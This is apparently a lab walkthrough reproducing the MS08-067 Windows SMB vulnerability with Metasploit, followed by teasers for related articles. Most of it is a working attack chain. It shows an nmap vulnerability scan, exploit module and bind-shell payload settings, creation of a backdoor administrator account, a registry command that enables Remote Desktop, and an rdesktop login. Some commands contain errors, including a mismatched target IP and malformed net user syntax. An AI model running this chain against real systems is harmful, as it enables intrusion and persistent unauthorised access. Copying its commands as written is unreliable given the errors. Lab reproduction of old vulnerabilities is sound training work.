Win MS08-067 vulnerability reproduction

tags: Vulnerability recurrence  Safety

Sphere of influence:
Windows 2000
Windows XP
Windows Server 2003
Reproduce the environment
win xp :192.168.31.49
kali :192.168.31.117
recurrent:
Does nmap scan vulnerability exist:

nmap -n -p 445 --script smb-vuln-ms08-067 192.168.31.49 --open


Open metasploite, find ms08-067 module and enter:

root@kali:~# msfconsole 
msf5 > search ms08-067
msf5 > use exploit/windows/smb/ms08_067_netapi 


Target ip:set RHOST 192.168.44.49
Port:set RPORT 445
payload:set payload generic/shell_bind_tcp
Attack machine ip, type, configuration information Start:
set LHOST 192.168.31.117
set target 0
show options
exploit


Create an admin user:

net user h 123 /add
net user localgroup administratos h /add


Open port 3389:

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat


Use h user connection to log in

rdesktop 192.168.31.49


Reference link:
https://blog.csdn.net/Eastmount/article/details/104834931
https://blog.csdn.net/s0mor/article/details/98937473

Intelligent Recommendation

ms08-067 vulnerability target machine configuration

This vulnerability of ms08-067 is one of the most basic vulnerabilities when we are learning msf. Many tutorials will mention this vulnerability, but this vulnerability is very picky about the reprodu...

MS08-067 vulnerability remote overflow intrusion test

The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability." If a user receives a specially crafted RPC request on an affected system, t...

#windowsxpsp3 system MS08-067 vulnerability test

#windowsxpsp3 system MS08-067 vulnerability test Vulnerability description The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". ...

MS08-067 vulnerability penetration attack process

lab environment kali linux2.0 win-xp sp3 Steps 1. Execute in the Kali Linux command line 2. Query MS08067 Vulnerability 3. Using Exploit / Windows / SMB / MS08_067_Netapi and view Options 4. Using Pay...

[Vulnerability recurrence] MS08-067 classic remote overflow vulnerability recurrence

ms08-067 introduction The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Windows 7 ...

More Recommendation

MS08-067 Remote Overflow Vulnerability (CVE-2008-4250)

MS08-067 Remote Overflow Vulnerability   Brief description of the vulnerability principle The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote ...

Using ms08-067 vulnerability to remotely control Windows XP

1. Find ms08-067: 2. Use: 3. Select the payload: (At the beginning, there is a difference between windows / shell / ... and windows / meterpreter / reverse_tpc) 4. View options (yes is required): 5. E...

The process of using metasploit (MSF) to exploit the ms08-067 vulnerability of windows

0x01 experimental environment Attack machine: kali linux ip:10.10.10.131 Target machine: windows server 2003 ip:10.10.10.130 0x02 configure exploit msf > use exploit/windows/smb/ms08_067_netapi&nbs...

Windows XP SP3 (MS08-067 Vulnerability Revision and Utilization)

Put the previous experiments and written in the note in the cloud, put it on the CSDN First, an experimental environment Target: Windows XP SP3 Professional (Close Windows self-contained firewall!!!) ...

Windows XP SP2 (MS08-067 vulnerability reappearance and utilization)

MS08-067 Vulnerability: It is a vulnerability in a remote process call (RPC) service. When calling the NetPathCanonicalize function in the SMB channel, the vulnerability is triggered, causing the use ...

Copyright  DMCA © 2018-2026 - All Rights Reserved - www.programmersought.com  User Notice

Top